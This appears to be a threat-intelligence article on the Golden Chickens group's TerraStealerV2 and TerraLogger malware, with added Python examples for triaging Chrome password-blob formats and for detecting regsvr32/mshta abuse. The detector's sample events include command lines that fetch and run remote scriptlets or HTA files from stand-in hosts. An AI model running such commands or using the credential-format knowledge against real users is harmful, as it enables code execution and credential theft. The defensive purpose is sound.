The cybercriminal group known as Golden Chickens, also referred to as Venom Spider, has introduced two new malware variants: TerraStealerV2 and TerraLogger. These developments indicate the group’s ongoing efforts to enhance and diversify their malicious toolkit.
Golden Chickens has been active since at least 2018, operating under a Malware-as-a-Service (MaaS) model. They offer a suite of malicious tools to other cybercriminals, enabling a wide range of attacks without the need for extensive technical expertise. Their portfolio includes notable malware such as More_eggs, TerraLoader, and VenomLNK.
TerraStealerV2 is designed to harvest sensitive information from victims' systems: browser credentials, cryptocurrency wallet data, and browser extension data. It has been observed packaged in several formats, including executables (EXE), dynamic-link libraries (DLL), Windows Installer packages (MSI), and shortcut (LNK) files. In each case the packaging is only a first stage; the stealer itself is delivered as an OCX (OLE Control Extension) file, a COM control in DLL form, fetched from an external domain such as wetransfers[.]io, a lookalike of the legitimate WeTransfer file-sharing service.
Once executed, TerraStealerV2 focuses on the Chrome browser's 'Login Data' SQLite database to collect saved credentials. However, it does not bypass App-Bound Encryption (ABE), which Chrome 127 (July 2024) introduced so that the key protecting saved passwords is released only to Chrome itself by an elevated service, rather than being unwrappable with the logged-on user's DPAPI keys. Against an up-to-date Chrome the database it copies therefore yields only ciphertext it cannot open, which suggests the code is either outdated or still under development. Whatever it does collect is exfiltrated both to Telegram and to wetransfers[.]io. To blend in with normal activity, TerraStealerV2 executes through signed, built-in Windows utilities (living-off-the-land binaries) such as regsvr32.exe, the standard loader for OCX controls, and mshta.exe.
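The ABE limitation is visible in the data itself: Chrome stores each saved password as a blob whose prefix records the protection scheme. The following Python example, added here and not taken from the report or from the malware, builds a constructed 'Login Data' file with dummy rows (the real table has many more columns) and triages the blobs by format, which is a useful check of how much of a given profile a user-context stealer could actually decrypt. The blob layouts are Chrome's documented os_crypt formats; no decryption is performed.

```python
import os
import sqlite3
import tempfile

# Layout of a Chrome password blob (os_crypt on Windows):
#   b"v10" + 12-byte AES-GCM nonce + ciphertext + 16-byte tag
#       -> key lives in Local State (os_crypt.encrypted_key), DPAPI-wrapped in
#          the user's context, so any code running as that user can unwrap it.
#   b"v20" + 12-byte nonce + ciphertext + 16-byte tag
#       -> App-Bound Encryption (Chrome 127+, July 2024): the key is wrapped
#          under SYSTEM and only released to Chrome by an elevated service,
#          so a stealer running as the user cannot unwrap it.
#   raw DPAPI blob (starts with 0x01 0x00 0x00 0x00) -> pre-v10 legacy format.
V10 = b"v10"
V20 = b"v20"
DPAPI_MAGIC = b"\x01\x00\x00\x00"
NONCE_LEN = 12
TAG_LEN = 16


def classify_blob(blob: bytes) -> str:
    """Name the protection scheme from the blob prefix."""
    if blob.startswith(V20):
        return "v20-app-bound"
    if blob.startswith(V10):
        return "v10-local-state-key"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi-legacy"
    return "unknown"


def split_gcm_blob(blob: bytes) -> dict:
    """Split a v10/v20 blob into nonce, ciphertext and tag (no decryption)."""
    body = blob[len(V10):]
    if len(body) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short for nonce + tag")
    return {
        "nonce": body[:NONCE_LEN],
        "ciphertext": body[NONCE_LEN:-TAG_LEN],
        "tag": body[-TAG_LEN:],
    }


def user_context_can_decrypt(blob: bytes) -> bool:
    """True if code running as the logged-on user holds everything needed."""
    return classify_blob(blob) in ("v10-local-state-key", "dpapi-legacy")


def triage_login_data(db_path: str) -> dict:
    """Count password blobs by scheme in a Login Data SQLite file."""
    counts = {"v10-local-state-key": 0, "v20-app-bound": 0,
              "dpapi-legacy": 0, "unknown": 0}
    con = sqlite3.connect(db_path)
    try:
        for (blob,) in con.execute("SELECT password_value FROM logins"):
            counts[classify_blob(bytes(blob))] += 1
    finally:
        con.close()
    return counts


def build_sample_login_data(db_path: str) -> None:
    """Constructed sample: only the three columns a stealer reads, with
    dummy bytes standing in for ciphertext (not real credentials)."""
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE logins (origin_url TEXT, "
                "username_value TEXT, password_value BLOB)")
    rows = [
        ("https://mail.example.com", "alice",
         V10 + b"N" * NONCE_LEN + b"\xaa" * 20 + b"T" * TAG_LEN),
        ("https://bank.example.com", "alice",
         V20 + b"N" * NONCE_LEN + b"\xbb" * 24 + b"T" * TAG_LEN),
        ("https://old.example.com", "alice",
         DPAPI_MAGIC + b"\xcc" * 40),
    ]
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", rows)
    con.commit()
    con.close()


def demo() -> dict:
    """Build the sample file in a temp dir and triage it."""
    path = os.path.join(tempfile.mkdtemp(), "Login Data")
    build_sample_login_data(path)
    return triage_login_data(path)


if __name__ == "__main__":
    print(demo())  # one decryptable v10, one legacy, one v20 the user cannot open
```

On a real profile the file is locked while Chrome runs, so both stealers and investigators work from a copy; a profile in which every blob classifies as v20 is one a user-context stealer of this kind walks away from with nothing usable.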
TerraLogger, the second new tool, is a standalone keylogger. It installs a standard low-level keyboard hook (the Win32 WH_KEYBOARD_LL hook set through SetWindowsHookEx) to capture keystrokes and writes them to local log files. Notably, it contains no exfiltration or command-and-control (C2) functionality at all, so the captured logs never leave the host on their own. That absence suggests the tool is either at an early stage of development or intended to run alongside other components of the Golden Chickens MaaS ecosystem that handle collection and exfiltration.
The current state of TerraStealerV2 and TerraLogger indicates that both tools are under active development and do not yet show the level of stealth associated with mature Golden Chickens malware such as More_eggs. Given the group's history of building and selling tooling for credential theft and initial access, these capabilities are likely to keep evolving.
The emergence of TerraStealerV2 and TerraLogger underscores the persistent threat posed by Golden Chickens and similar MaaS operators: even an unfinished stealer is sold on and deployed. The details above also point to concrete defences. Keeping Chrome current matters, because App-Bound Encryption alone defeats this stealer's credential theft. Process telemetry should flag regsvr32.exe and mshta.exe when they load content from a URL or from a user-writable directory, since that is how the OCX payload is run. And LNK, MSI, and executable attachments or downloads that call out to file-transfer lookalike domains such as wetransfers[.]io deserve blocking or at least alerting.
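The regsvr32.exe and mshta.exe abuse described above is one of the more reliable hunting angles, because legitimate use of those binaries rarely involves remote URLs or user-writable paths. The Python example below is added here and is not from the report or any vendor product; it runs simple detection logic over constructed process-creation events modelled on Sysmon Event ID 1 fields (image, command line, parent). The `.invalid` hostnames and file names are hypothetical and were chosen so the sample never resolves.

```python
import re

# Patterns a process-creation event is checked against.
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(
    r"(?:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\"
    r"|\\ProgramData\\|\\Temp\\|%(?:TEMP|TMP|APPDATA|LOCALAPPDATA)%)",
    re.IGNORECASE,
)
PAYLOAD_EXT_RE = re.compile(r"\.(?:ocx|dll|sct|hta|vbs|js)\b", re.IGNORECASE)
SCRIPT_PROTO_RE = re.compile(r"\b(?:vbscript|javascript):", re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the list of reasons an event looks like LOLBin abuse (empty = benign)."""
    reasons = []
    name = image_name(event["image"])
    cmd = event["cmdline"]
    lowered = cmd.lower()
    if name == "regsvr32.exe":
        if URL_RE.search(cmd):
            reasons.append("regsvr32 referencing a remote URL")
        if PAYLOAD_EXT_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
            reasons.append("regsvr32 loading a control from a user-writable path")
        if "/i:" in lowered and "scrobj.dll" in lowered:
            reasons.append("regsvr32 scriptlet execution (/i: with scrobj.dll)")
    elif name == "mshta.exe":
        if URL_RE.search(cmd):
            reasons.append("mshta loading a remote HTA")
        if SCRIPT_PROTO_RE.search(cmd):
            reasons.append("mshta with inline vbscript:/javascript: payload")
        if USER_WRITABLE_RE.search(cmd):
            reasons.append("mshta running content from a user-writable path")
    return reasons


def scan(events: list) -> list:
    """Yield (event id, reasons) for every event that trips a rule."""
    hits = []
    for event in events:
        reasons = evaluate(event)
        if reasons:
            hits.append((event["id"], reasons))
    return hits


# Constructed sample telemetry (not taken from the report).
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\ctrl.ocx",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": "e2", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i:https://files.example.invalid/p.sct scrobj.dll",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": "e3", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://files.example.invalid/x.hta",
     "parent": r"C:\Windows\explorer.exe"},
    # Benign: an installer registering a control from Program Files.
    {"id": "e4", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"',
     "parent": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

The user-writable-path rule is the one that needs tuning: some installers drop an OCX into %TEMP% before registering it, so in practice the parent process (msiexec.exe or a signed installer versus explorer.exe launching an LNK, as in e1) is the field that separates the two cases.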